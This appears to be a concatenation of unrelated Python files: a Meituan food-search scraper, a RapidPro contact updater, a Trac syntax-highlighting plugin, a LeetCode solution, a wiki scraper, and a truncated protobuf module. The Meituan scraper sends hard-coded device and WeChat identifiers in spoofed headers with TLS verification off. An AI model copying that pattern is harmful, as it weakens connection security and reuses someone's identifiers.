baidu_map_url_temp = "http://api.map.baidu.com/geocoding/v3/?address={}&output=json&ak={}"
wm_get_url = "https://apimobile.meituan.com/group/v4/poi/pcsearch/278"
def ride_indication(address, shop_list):
final_list = []
for (index, good) in enumerate(shop_list):
shop = {}
shop["title"] = good["title"]
shop["address"] = good["address"]
shop["latitude"] = good["latitude"]
shop["longitude"] = good["longitude"]
final_list.append(shop)
print(index, good["title"], good["address"])
orig_lat = str("%.6f" % float(address[0]))
orig_lng = str("%.6f" % float(address[1]))
# print(orig_lat, orig_lng)
index = int(input("请输入选择的序号:"))
shop = final_list[index]
des_lat = shop["latitude"]
des_lng = shop["longitude"]
ride_url = Config.ride_url_temp.format(orig_lat, orig_lng, des_lat, des_lng, Config.ak)
route_resp = requests.get(ride_url)
# print(route_resp.json()["result"]["routes"]["steps"])
result = route_resp.json()["result"]
step_list = result["routes"][0]["steps"]
for step in step_list:
print(step["instructions"], step["turn_type"])
def meituan_get(key):
lat, lng = get_address()
get_header = {
"uuid": "5DBAEC411BBD1E5C20EE784F5827EDA5B8E62FB5197A319B67812B49E6634DE0",
"myLng": lng,
"utm_medium": "iphone",
"myLat": lat,
"open_id": "oJVP50OIunB7-0GeCAihfS71QT5g",
"User-Agent" : "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/16A366 MicroMessenger/7.0.10(0x17000a21) NetType/WIFI Language/zh_CN"
}
get_params = {
"limit": "15",
"mypos": "{},{}".format(lat, lng),
"cityId": "278",
"q": key
}
# get
get_resp = requests.get(Config.wm_get_url, params=get_params, headers=get_header, verify=False)
result_list = get_resp.json()["data"]["searchResult"]
ride_indication((lat, lng), result_list)
def meituan_post():
post_params = {
"wm_dtype": "iPhone 8 Plus (GSM+CDMA)<iPhone10,2>",
"wm_uuid": "1122100804401172552",
"wm_longitude": "110260609",
"wm_latitude": "21375185",
"wm_visitid": "223e025a-0d62-4483-802b-2d7886a9b63c",
"wm_appversion": "5.2.1",
"req_time": "1581776426207",
"keyword": "烧烤",
"sort_type": "0",
"page_index": "0",
"query_type": "1",
"sub_category_type": "0",
"category_type": "0"
}
post_header = {
"Host": "wx.waimai.meituan.com",
"uuid": "1122100804401172552",
"Referer": "https://servicewechat.com/wx2c348cf579062e56/239/page-frame.html",
"wm-ctype": "wxapp",
"User-Agent" : "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/16A366 MicroMessenger/7.0.10(0x17000a21) NetType/WIFI Language/zh_CN"
}
# post
post_url = "https://wx.waimai.meituan.com/weapp/v2/search/v9/poi"
post_resp = requests.post(post_url, data=post_params, headers=post_header, verify=False)
print(post_resp.status_code)
# print(post_resp.json())
def get_address():
address = input("请输入要搜索地点:")
baidu_map_url = Config.baidu_map_url_temp.format(address, Config.ak)
resp = requests.get(baidu_map_url)
result = resp.json()["result"]
print(result["location"]["lng"], result["location"]["lat"])
lng = str(result["location"]["lng"])
lat = str(result["location"]["lat"])
return (lat, lng)
if __name__ == '__main__':
key = input("请输入要搜索的关键字:")
meituan_get(key) | python |
import datetime
import time
import iso8601
import psycopg2
from temba_client.v2 import TembaClient
RAPIDPRO_URL = "https://rapidpro.prd.momconnect.co.za/"
RAPIDPRO_TOKEN = ""
DB = {
"dbname": "ndoh_rapidpro",
"user": "ndoh_rapidpro",
"port": 7000,
"host": "localhost",
"password": "",
}
if __name__ == "__main__":
rapidpro_client = TembaClient(RAPIDPRO_URL, RAPIDPRO_TOKEN)
conn = psycopg2.connect(**DB)
cursor = conn.cursor("contacts")
mapping_cursor = conn.cursor()
mapping_cursor.execute(
"""
SELECT key, uuid
FROM contacts_contactfield
WHERE org_id=5
"""
)
field_mapping = dict(mapping_cursor)
now = datetime.date.today()
print("Processing contacts...") # noqa
cursor.execute(
"""
SELECT
distinct contacts_contact.id,
contacts_contact.uuid,
contacts_contact.fields,
contacts_contactgroup.id,
contacts_contact.created_on
FROM contacts_contactgroup,
campaigns_campaign,
contacts_contactgroup_contacts
left outer join campaigns_eventfire
on campaigns_eventfire.contact_id =
contacts_contactgroup_contacts.contact_id,
contacts_contact
WHERE contacts_contactgroup.org_id = 5
and contacts_contactgroup.id in (326, 327, 328, 329, 330, 331, 332)
AND campaigns_campaign.group_id = contacts_contactgroup.id
and contacts_contactgroup_contacts.contactgroup_id = contacts_contactgroup.id
and campaigns_eventfire.contact_id is null
and contacts_contactgroup_contacts.contact_id = contacts_contact.id
"""
)
total = 0
updated = 0
contact_id = 0
start, d_print = time.time(), time.time()
for (contact_id, contact_uuid, fields, group_id, created_on) in cursor:
should_receive_msgs = False
fields_to_update = {}
date_value = fields.get(field_mapping["edd"], {}).get("datetime")
text_value = fields.get(field_mapping["edd"], {}).get("text")
if date_value:
date_obj = iso8601.parse_date(date_value)
delta = datetime.date.today() - date_obj.date()
if delta.days <= 11:
should_receive_msgs = True
fields_to_update["edd"] = text_value
if should_receive_msgs:
updated += 1
rapidpro_client.update_contact(contact_uuid, fields=fields_to_update)
if time.time() - d_print > 1:
print( # noqa
f"\rProcessed {updated}/{total} contacts at "
f"{total/(time.time() - start):.0f}/s - ({contact_id})",
end="",
)
d_print = time.time()
total += 1
print( # noqa
f"\rProcessed {updated}/{total} contacts at "
f"{total/(time.time() - start):.0f}/s - ({contact_id})"
)
| python |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2009 Edgewall Software
# Copyright (C) 2006 Matthew Good <[email protected]>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# Author: Matthew Good <[email protected]>
from __future__ import absolute_import
import os
import pygments
import re
from datetime import datetime
from pkg_resources import resource_filename
from pygments.formatters.html import HtmlFormatter
from pygments.lexers import get_all_lexers, get_lexer_by_name
from pygments.styles import get_all_styles, get_style_by_name
from trac.core import *
from trac.config import ConfigSection, ListOption, Option
from trac.env import ISystemInfoProvider
from trac.mimeview.api import IHTMLPreviewRenderer, Mimeview
from trac.prefs import IPreferencePanelProvider
from trac.util import get_pkginfo, lazy
from trac.util.datefmt import http_date, localtz
from trac.util.translation import _
from trac.web.api import IRequestHandler, HTTPNotFound
from trac.web.chrome import ITemplateProvider, add_notice, add_stylesheet
from genshi import QName, Stream
from genshi.core import Attrs, START, END, TEXT
__all__ = ['PygmentsRenderer']
class PygmentsRenderer(Component):
"""HTML renderer for syntax highlighting based on Pygments."""
implements(ISystemInfoProvider, IHTMLPreviewRenderer,
IPreferencePanelProvider, IRequestHandler,
ITemplateProvider)
is_valid_default_handler = False
pygments_lexer_options = ConfigSection('pygments-lexer',
"""Configure Pygments [%(url)s lexer] options.
For example, to set the
[%(url)s#lexers-for-php-and-related-languages PhpLexer] options
`startinline` and `funcnamehighlighting`:
{{{#!ini
[pygments-lexer]
php.startinline = True
php.funcnamehighlighting = True
}}}
The lexer name is derived from the class name, with `Lexer` stripped
from the end. The lexer //short names// can also be used in place
of the lexer name.
""" % {'url': 'http://pygments.org/docs/lexers/'})
default_style = Option('mimeviewer', 'pygments_default_style', 'trac',
"""The default style to use for Pygments syntax highlighting.""")
pygments_modes = ListOption('mimeviewer', 'pygments_modes',
'', doc=
"""List of additional MIME types known by Pygments.
For each, a tuple `mimetype:mode:quality` has to be
specified, where `mimetype` is the MIME type,
`mode` is the corresponding Pygments mode to be used
for the conversion and `quality` is the quality ratio
associated to this conversion. That can also be used
to override the default quality ratio used by the
Pygments render.""")
expand_tabs = True
returns_source = True
QUALITY_RATIO = 7
EXAMPLE = """<!DOCTYPE html>
<html lang="en">
<head>
<title>Hello, world!</title>
<script>
jQuery(document).ready(function($) {
$("h1").fadeIn("slow");
});
</script>
</head>
<body>
<h1>Hello, world!</h1>
</body>
</html>"""
# ISystemInfoProvider methods
def get_system_info(self):
version = get_pkginfo(pygments).get('version')
# if installed from source, fallback to the hardcoded version info
if not version and hasattr(pygments, '__version__'):
version = pygments.__version__
yield 'Pygments', version
# IHTMLPreviewRenderer methods
def get_extra_mimetypes(self):
for _, aliases, _, mimetypes in get_all_lexers():
for mimetype in mimetypes:
yield mimetype, aliases
def get_quality_ratio(self, mimetype):
# Extend default MIME type to mode mappings with configured ones
try:
return self._types[mimetype][1]
except KeyError:
return 0
def render(self, context, mimetype, content, filename=None, rev=None):
req = context.req
style = req.session.get('pygments_style', self.default_style)
add_stylesheet(req, '/pygments/%s.css' % style)
try:
if len(content) > 0:
mimetype = mimetype.split(';', 1)[0]
language = self._types[mimetype][0]
return self._generate(language, content, context)
except (KeyError, ValueError):
raise Exception("No Pygments lexer found for mime-type '%s'."
% mimetype)
# IPreferencePanelProvider methods
def get_preference_panels(self, req):
yield 'pygments', _('Syntax Highlighting')
def render_preference_panel(self, req, panel):
styles = list(get_all_styles())
if req.method == 'POST':
style = req.args.get('style')
if style and style in styles:
req.session['pygments_style'] = style
add_notice(req, _("Your preferences have been saved."))
req.redirect(req.href.prefs(panel or None))
for style in sorted(styles):
add_stylesheet(req, '/pygments/%s.css' % style, title=style.title())
output = self._generate('html', self.EXAMPLE)
return 'prefs_pygments.html', {
'output': output,
'selection': req.session.get('pygments_style', self.default_style),
'styles': styles
}
# IRequestHandler methods
def match_request(self, req):
match = re.match(r'/pygments/(\w+)\.css', req.path_info)
if match:
req.args['style'] = match.group(1)
return True
def process_request(self, req):
style = req.args['style']
try:
style_cls = get_style_by_name(style)
except ValueError as e:
raise HTTPNotFound(e)
parts = style_cls.__module__.split('.')
filename = resource_filename('.'.join(parts[:-1]), parts[-1] + '.py')
mtime = datetime.fromtimestamp(os.path.getmtime(filename), localtz)
last_modified = http_date(mtime)
if last_modified == req.get_header('If-Modified-Since'):
req.send_response(304)
req.end_headers()
return
formatter = HtmlFormatter(style=style_cls)
content = u'\n\n'.join([
formatter.get_style_defs('div.code pre'),
formatter.get_style_defs('table.code td')
]).encode('utf-8')
req.send_response(200)
req.send_header('Content-Type', 'text/css; charset=utf-8')
req.send_header('Last-Modified', last_modified)
req.send_header('Content-Length', len(content))
req.write(content)
# ITemplateProvider methods
def get_htdocs_dirs(self):
return []
def get_templates_dirs(self):
return [resource_filename('trac.mimeview', 'templates')]
# Internal methods
@lazy
def _lexer_alias_name_map(self):
lexer_alias_name_map = {}
for lexer_name, aliases, _, _ in get_all_lexers():
name = aliases[0] if aliases else lexer_name
for alias in aliases:
lexer_alias_name_map[alias] = name
return lexer_alias_name_map
@lazy
def _lexer_options(self):
lexer_options = {}
for key, lexer_option_value in self.pygments_lexer_options.options():
try:
lexer_name_or_alias, lexer_option_name = key.split('.')
except ValueError:
pass
else:
lexer_name = self._lexer_alias_to_name(lexer_name_or_alias)
lexer_option = {lexer_option_name: lexer_option_value}
lexer_options.setdefault(lexer_name, {}).update(lexer_option)
return lexer_options
@lazy
def _types(self):
types = {}
for lexer_name, aliases, _, mimetypes in get_all_lexers():
name = aliases[0] if aliases else lexer_name
for mimetype in mimetypes:
types[mimetype] = (name, self.QUALITY_RATIO)
# Pygments < 1.4 doesn't know application/javascript
if 'application/javascript' not in types:
js_entry = self._types.get('text/javascript')
if js_entry:
types['application/javascript'] = js_entry
types.update(Mimeview(self.env).configured_modes_mapping('pygments'))
return types
def _generate(self, language, content, context=None):
lexer_name = self._lexer_alias_to_name(language)
lexer_options = {'stripnl': False}
lexer_options.update(self._lexer_options.get(lexer_name, {}))
if context:
lexer_options.update(context.get_hint('lexer_options', {}))
lexer = get_lexer_by_name(lexer_name, **lexer_options)
return GenshiHtmlFormatter().generate(lexer.get_tokens(content))
def _lexer_alias_to_name(self, alias):
return self._lexer_alias_name_map.get(alias, alias)
class GenshiHtmlFormatter(HtmlFormatter):
"""A Pygments formatter subclass that generates a Python stream instead
of writing markup as strings to an output file.
"""
def _chunk(self, tokens):
"""Groups tokens with the same CSS class in the token stream
and yields them one by one, along with the CSS class, with the
values chunked together."""
last_class = None
text = []
for ttype, value in tokens:
c = self._get_css_class(ttype)
if c == 'n':
c = ''
if c == last_class:
text.append(value)
continue
# If no value, leave the old <span> open.
if value:
yield last_class, u''.join(text)
text = [value]
last_class = c
if text:
yield last_class, u''.join(text)
def generate(self, tokens):
pos = None, -1, -1
span = QName('span')
class_ = QName('class')
def _generate():
for c, text in self._chunk(tokens):
if c:
attrs = Attrs([(class_, c)])
yield START, (span, attrs), pos
yield TEXT, text, pos
yield END, span, pos
else:
yield TEXT, text, pos
return Stream(_generate())
| python |
#!/usr/bin/env python
# -- coding: utf-8 --
"""
@AUTHOR : zlikun <[email protected]>
@DATE : 2019/03/01 17:03:55
@DESC : 两数相加
"""
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def addTwoNumbers(self, m: ListNode, n: ListNode) -> ListNode:
if not m:
return n
if not n:
return m
carry = 0
head = ListNode(None)
curr = head
while m or n:
t = carry
if m:
t += m.val
m = m.next
if n:
t += n.val
n = n.next
curr.val = t % 10
carry = t // 10
node = ListNode(carry)
if m or n or carry > 0:
curr.next, curr = node, node
return head
def traverse(head: "ListNode"):
while head:
print(head.val, end="\t")
head = head.next
print()
def test1():
m = ListNode(2)
m.next = ListNode(4)
m.next.next = ListNode(3)
traverse(m)
n = ListNode(5)
n.next = ListNode(6)
n.next.next = ListNode(4)
traverse(n)
traverse(Solution().addTwoNumbers(m, n))
def test2():
m = ListNode(5)
traverse(m)
n = ListNode(5)
traverse(n)
traverse(Solution().addTwoNumbers(m, n))
if __name__ == '__main__':
test1()
print('-' * 32)
test2()
| python |
#-*- coding: utf-8 -*-
from api.management.commands.importbasics import *
def import_idols(opt):
local, redownload = opt['local'], opt['redownload']
idols = models.Idol.objects.all().order_by('-main', '-main_unit')
for idol in raw_information.keys():
card = models.Card.objects.filter(name=idol).order_by('id')[0]
raw_information[idol]['main'] = True
idol, created = models.Idol.objects.update_or_create(name=idol, defaults=raw_information[idol])
for n in raw_information_n.keys():
idol, created = models.Idol.objects.update_or_create(name=n, defaults=raw_information_n[n])
if not local:
print "### Import idols"
for idol in idols:
if not idol:
continue
if idol.attribute and not redownload:
continue
print ' Import Idol', idol, '...',
f = urllib2.urlopen('http://decaf.kouhi.me/lovelive/index.php?title=' + urllib.quote(idol.name))
soup = BeautifulSoup(f.read())
html = soup.find('div', { 'id': 'mw-content-text'})
if html is not None:
html.find('div', { 'id', 'toc' }).extract()
defaults = {}
wikitable = None
if idol.main:
wikitable = html.find('table', { 'class': 'wikitable' })
if idol.main_unit == 'Aqours':
defaults['school'] = 'Uranohoshi Girls\' High School'
else:
defaults['school'] = 'Otonokizaka Academy'
ul_ = html.find('ul')
ul = ul_.find_all('li')
for li in ul:
if li.b is not None:
title = clean(clean(li.b.extract().text).replace(':', ''))
content = clean(li.text)
if title is not None and content is not None and content != '?' and content != ' ?' and content != 'B? / W? / H?' and content != '' and content != '?cm':
if title == 'Age':
defaults['age'] = content
elif title == 'Birthday':
split = content.replace(')', '').split('(')
birthday = dateutil.parser.parse(clean(split[0]))
sign = clean(split[-1])
defaults['birthday'] = birthday
defaults['astrological_sign'] = sign
elif title == 'Japanese Name':
defaults['japanese_name'] = content
elif title == 'Blood Type':
defaults['blood'] = content
elif title == 'Height':
defaults['height'] = content.replace('cm', '')
elif title == 'Three Sizes':
defaults['measurements'] = content
elif title == 'Favorite Food' or title == 'Favorite Foods':
defaults['favorite_food'] = content
elif title == 'Least Favorite Food' or title == 'Least Favorite Foods':
defaults['least_favorite_food'] = content
elif title == 'Hobbies':
defaults['hobbies'] = content
elif title == 'Main Attribute':
defaults['attribute'] = content
elif title == 'Year':
defaults['year'] = content
elif title == 'Former School':
defaults['school'] = content
elif title == 'CV':
defaults['cv'] = content
if li.a:
defaults['cv_url'] = li.a.get('href')
else:
print '/!\\ Unknown content', title, content
if wikitable is not None:
ps = wikitable.find_all('p')
if len(ps) >= 2:
if ps[0].br is not None:
ps[0].br.extract()
defaults['summary'] = clean(ps[0].text)
if ps[1].a is not None:
url = ps[1].a.get('href')
defaults['official_url'] = url
if idol.main:
tables = html.find_all('table', { 'class': 'wikitable' })
for table in tables:
th = table.find('th', { 'colspan': '6' })
if th is not None:
text = th.find('span').text
if '(' in text and '#' in text:
name = text.split('(')[1].split(')')[0]
name = name.replace(' Ver.', '').strip()
id_card = int(text.split('#')[-1].replace(']', ''))
print 'Set collection', name, 'for #', str(id_card)
models.Card.objects.filter(pk=id_card).update(translated_collection=name)
idol, created = models.Idol.objects.update_or_create(name=idol, defaults=defaults)
f.close()
print 'Done'
class Command(BaseCommand):
can_import_settings = True
def handle(self, *args, **options):
opt = opt_parse(args)
import_idols(opt)
import_raw_db()
| python |
#-*- coding:utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
# Copyright (C) 2013-2015 Akretion (http://www.akretion.com)
from . import wizard
| python |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: rastervision/protos/task.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from rastervision.protos import class_item_pb2 as rastervision_dot_protos_dot_class__item__pb2
from google.protobuf import struct_pb2 as google_dot_protobuf_dot_struct__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='rastervision/protos/task.proto',
package='rv.protos',
syntax='proto2',
serialized_pb=_b('\n\x1erastervision/protos/task.proto\x12\trv.protos\x1a$rastervision/protos/class_item.proto\x1a\x1cgoogle/protobuf/struct.proto\"\x9e\x0b\n\nTaskConfig\x12\x11\n\ttask_type\x18\x01 \x02(\t\x12\x1e\n\x12predict_batch_size\x18\x02 \x01(\x05:\x02\x31\x30\x12\x1b\n\x13predict_package_uri\x18\x03 \x01(\t\x12\x13\n\x05\x64\x65\x62ug\x18\x04 \x01(\x08:\x04true\x12\x19\n\x11predict_debug_uri\x18\x05 \x01(\t\x12N\n\x17object_detection_config\x18\x06 \x01(\x0b\x32+.rv.protos.TaskConfig.ObjectDetectionConfigH\x00\x12T\n\x1a\x63hip_classification_config\x18\x07 \x01(\x0b\x32..rv.protos.TaskConfig.ChipClassificationConfigH\x00\x12X\n\x1csemantic_segmentation_config\x18\x08 \x01(\x0b\x32\x30.rv.protos.TaskConfig.SemanticSegmentationConfigH\x00\x12\x30\n\rcustom_config\x18\t \x01(\x0b\x32\x17.google.protobuf.StructH\x00\x1a\xb2\x03\n\x15ObjectDetectionConfig\x12)\n\x0b\x63lass_items\x18\x01 \x03(\x0b\x32\x14.rv.protos.ClassItem\x12\x11\n\tchip_size\x18\x02 \x02(\x05\x12M\n\x0c\x63hip_options\x18\x03 \x02(\x0b\x32\x37.rv.protos.TaskConfig.ObjectDetectionConfig.ChipOptions\x12S\n\x0fpredict_options\x18\x04 \x02(\x0b\x32:.rv.protos.TaskConfig.ObjectDetectionConfig.PredictOptions\x1ao\n\x0b\x43hipOptions\x12\x11\n\tneg_ratio\x18\x01 \x02(\x02\x12\x17\n\nioa_thresh\x18\x02 \x01(\x02:\x03\x30.8\x12\x1b\n\rwindow_method\x18\x03 \x01(\t:\x04\x63hip\x12\x17\n\x0clabel_buffer\x18\x04 \x01(\x02:\x01\x30\x1a\x46\n\x0ePredictOptions\x12\x19\n\x0cmerge_thresh\x18\x02 \x01(\x02:\x03\x30.5\x12\x19\n\x0cscore_thresh\x18\x03 \x01(\x02:\x03\x30.5\x1aX\n\x18\x43hipClassificationConfig\x12)\n\x0b\x63lass_items\x18\x01 \x03(\x0b\x32\x14.rv.protos.ClassItem\x12\x11\n\tchip_size\x18\x02 \x02(\x05\x1a\xbf\x03\n\x1aSemanticSegmentationConfig\x12)\n\x0b\x63lass_items\x18\x01 \x03(\x0b\x32\x14.rv.protos.ClassItem\x12\x11\n\tchip_size\x18\x02 \x02(\x05\x12R\n\x0c\x63hip_options\x18\x03 \x02(\x0b\x32<.rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions\x12\x1c\n\x11predict_chip_size\x18\x04 \x01(\x05:\x01\x30\x1a\xf0\x01\n\x0b\x43hipOptions\x12$\n\rwindow_method\x18\x01 \x01(\t:\rrandom_sample\x12\x16\n\x0etarget_classes\x18\x02 \x03(\x05\x12$\n\x16\x64\x65\x62ug_chip_probability\x18\x03 \x01(\x02:\x04\x30.25\x12(\n\x1dnegative_survival_probability\x18\x04 \x01(\x02:\x01\x31\x12\x1d\n\x0f\x63hips_per_scene\x18\x05 \x01(\x05:\x04\x31\x30\x30\x30\x12$\n\x16target_count_threshold\x18\x06 \x01(\x05:\x04\x32\x30\x34\x38\x12\x0e\n\x06stride\x18\x07 \x01(\x05\x42\r\n\x0b\x63onfig_type')
,
dependencies=[rastervision_dot_protos_dot_class__item__pb2.DESCRIPTOR,google_dot_protobuf_dot_struct__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_TASKCONFIG_OBJECTDETECTIONCONFIG_CHIPOPTIONS = _descriptor.Descriptor(
name='ChipOptions',
full_name='rv.protos.TaskConfig.ObjectDetectionConfig.ChipOptions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='neg_ratio', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.ChipOptions.neg_ratio', index=0,
number=1, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ioa_thresh', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.ChipOptions.ioa_thresh', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.8),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='window_method', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.ChipOptions.window_method', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=True, default_value=_b("chip").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='label_buffer', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.ChipOptions.label_buffer', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=814,
serialized_end=925,
)
_TASKCONFIG_OBJECTDETECTIONCONFIG_PREDICTOPTIONS = _descriptor.Descriptor(
name='PredictOptions',
full_name='rv.protos.TaskConfig.ObjectDetectionConfig.PredictOptions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='merge_thresh', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.PredictOptions.merge_thresh', index=0,
number=2, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='score_thresh', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.PredictOptions.score_thresh', index=1,
number=3, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=927,
serialized_end=997,
)
_TASKCONFIG_OBJECTDETECTIONCONFIG = _descriptor.Descriptor(
name='ObjectDetectionConfig',
full_name='rv.protos.TaskConfig.ObjectDetectionConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='class_items', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.class_items', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chip_size', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.chip_size', index=1,
number=2, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chip_options', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.chip_options', index=2,
number=3, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='predict_options', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.predict_options', index=3,
number=4, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TASKCONFIG_OBJECTDETECTIONCONFIG_CHIPOPTIONS, _TASKCONFIG_OBJECTDETECTIONCONFIG_PREDICTOPTIONS, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=563,
serialized_end=997,
)
_TASKCONFIG_CHIPCLASSIFICATIONCONFIG = _descriptor.Descriptor(
name='ChipClassificationConfig',
full_name='rv.protos.TaskConfig.ChipClassificationConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='class_items', full_name='rv.protos.TaskConfig.ChipClassificationConfig.class_items', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chip_size', full_name='rv.protos.TaskConfig.ChipClassificationConfig.chip_size', index=1,
number=2, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=999,
serialized_end=1087,
)
_TASKCONFIG_SEMANTICSEGMENTATIONCONFIG_CHIPOPTIONS = _descriptor.Descriptor(
name='ChipOptions',
full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='window_method', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions.window_method', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=True, default_value=_b("random_sample").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='target_classes', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions.target_classes', index=1,
number=2, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='debug_chip_probability', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions.debug_chip_probability', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.25),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='negative_survival_probability', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions.negative_survival_probability', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chips_per_scene', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions.chips_per_scene', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=1000,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='target_count_threshold', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions.target_count_threshold', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=2048,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='stride', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions.stride', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1297,
serialized_end=1537,
)
_TASKCONFIG_SEMANTICSEGMENTATIONCONFIG = _descriptor.Descriptor(
name='SemanticSegmentationConfig',
full_name='rv.protos.TaskConfig.SemanticSegmentationConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='class_items', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.class_items', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chip_size', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.chip_size', index=1,
